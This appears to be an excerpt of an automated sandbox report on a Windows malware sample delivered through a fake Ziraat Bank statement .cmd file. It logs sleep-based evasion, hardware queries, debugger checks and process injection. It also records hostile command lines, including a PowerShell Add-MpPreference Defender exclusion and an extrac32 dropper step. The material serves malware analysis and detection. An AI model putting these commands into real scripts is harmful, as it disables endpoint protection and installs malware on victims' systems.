                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97831s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97706s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97592s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97485s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97346s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97229s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97112s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -96987s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -96862s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -96737s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -96612s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -96487s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -96362s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -96246s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99838s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99671s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99536s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99226s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -99105s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98984s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98874s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98546s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98437s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98327s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98218s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -98109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97999s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97671s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97124s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -97012s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 8072Thread sleep time: -96890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7996Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8108Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02D95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02D95908
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99841Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99682Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99522Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99392Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99248Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99105Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98983Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98860Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98743Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98632Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98515Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98407Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98288Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98147Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98030Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97920Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97811Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97661Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97403Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97231Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97104Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96987Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96862Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96622Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96511Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96299Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96174Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96049Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95924Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95799Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99953Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99732Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99612Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99484Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98867Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98607Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98469Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98340Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98233Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98072Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97945Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97834Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97708Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97580Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97451Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97291Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97087Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96940Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96797Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96016Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99861
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99718
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99592
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99351
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99106
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98670
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98540
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98356
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98203
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98081
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97957
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97829
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97519
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97350
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97175
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96957
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96795
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96550
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99792
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99641
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99504
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99391
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99279
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99167
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99055
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98943
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98828
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98692
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98578
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98253
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98106
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97956
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97831
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97706
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97592
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97485
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97346
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97229
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97112
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96987
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96862
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96737
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96612
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96487
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96362
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96246
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99953
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99838
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99671
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99536
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99226
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99105
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98984
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98874
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98765
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98656
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98546
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98437
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98327
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98218
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98109
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97999
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97890
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97781
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97671
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97562
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97453
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97343
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97234
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97124
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97012
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96890
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: x.exe, 00000004.00000002.2126176510.00000000008EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                      Source: neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                      Source: x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
                      Source: neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2261214334.000000000071E000.00000004.00000020.00020000.00000000.sdmp, Wisrysxl.PIF, 0000001D.00000002.2332989734.0000000000677000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_4-32760
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DAF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_02DAF744
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02DA894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02DA894C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 11_1_004015D7 SetUnhandledExceptionFilter,11_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 11_1_004015D7 SetUnhandledExceptionFilter,11_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 26_1_004015D7 SetUnhandledExceptionFilter,26_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 26_1_004015D7 SetUnhandledExceptionFilter,26_1_004015D7
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2F9008Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2E4008
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 377008
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
